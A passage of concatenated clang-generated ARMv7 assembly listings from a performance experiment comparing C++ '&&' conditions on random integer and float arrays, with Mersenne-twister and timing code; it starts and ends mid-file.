tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_and.cpp,%function
_GLOBAL__sub_I_and.cpp: @ @_GLOBAL__sub_I_and.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_and.cpp, .Ltmp17-_GLOBAL__sub_I_and.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_and.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,807
|
exp/cpp_and_and/ARMv7/s/compare_zero.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "compare_zero.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
ldr r1, [r4, r5]
cmp r1, #0
bne .LBB0_10
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
add r1, r4, r5
ldr r2, [r1, #4]
cmp r2, #0
bne .LBB0_10
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
ldr r2, [r1, #8]
cmp r2, #0
bne .LBB0_10
@ BB#9: @ in Loop: Header=BB0_6 Depth=1
ldr r1, [r1, #12]
cmp r1, #0
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_10: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#11:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#12:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#13: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#14: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#15: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#16: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_18
@ BB#17:
mov r0, r4
bl _ZdlPv
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_19:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_22
@ BB#20:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_21:
.Ltmp2:
mov r5, r0
.LBB0_22: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#23:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0
cmn r0, #1
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236
movt r4, #61382
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_compare_zero.cpp,%function
_GLOBAL__sub_I_compare_zero.cpp: @ @_GLOBAL__sub_I_compare_zero.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_compare_zero.cpp, .Ltmp17-_GLOBAL__sub_I_compare_zero.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 0000s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_compare_zero.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,998
|
exp/cpp_and_and/ARMv7/s/andand_float.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "andand_float.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32]
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528]
mov r0, #1
str r5, [sp, #24]
str r0, [sp, #28]
.Ltmp0:
movw r8, #36864
movt r8, #976
mov r0, r8
bl _Znwj
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
vmov s0, r0
add r0, r4, r5
add r5, r5, #4
vcvt.f32.s32 s0, s0
cmp r5, r8
vstr s0, [r0]
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20]
bl _ZNSt6chrono3_V212system_clock3nowEv
vmov.f32 s0, #1.000000e+00
movw r0, #36852
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
add r1, r4, r5
vldr s2, [r1]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
vldr s2, [r1, #4]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
vldr s2, [r1, #8]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#9: @ in Loop: Header=BB0_6 Depth=1
vldr s2, [r1, #12]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
ldreq r1, [sp, #20]
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_10: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#11:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#12:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#13: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#14: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_
.Ltmp10:
@ BB#15: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#16: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_18
@ BB#17:
mov r0, r4
bl _ZdlPv
.LBB0_18: @ %_ZNSt6vectorIfSaIfEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_19:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_22
@ BB#20:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_21:
.Ltmp2:
mov r5, r0
.LBB0_22: @ %_ZNSt6vectorIfSaIfEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#23:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
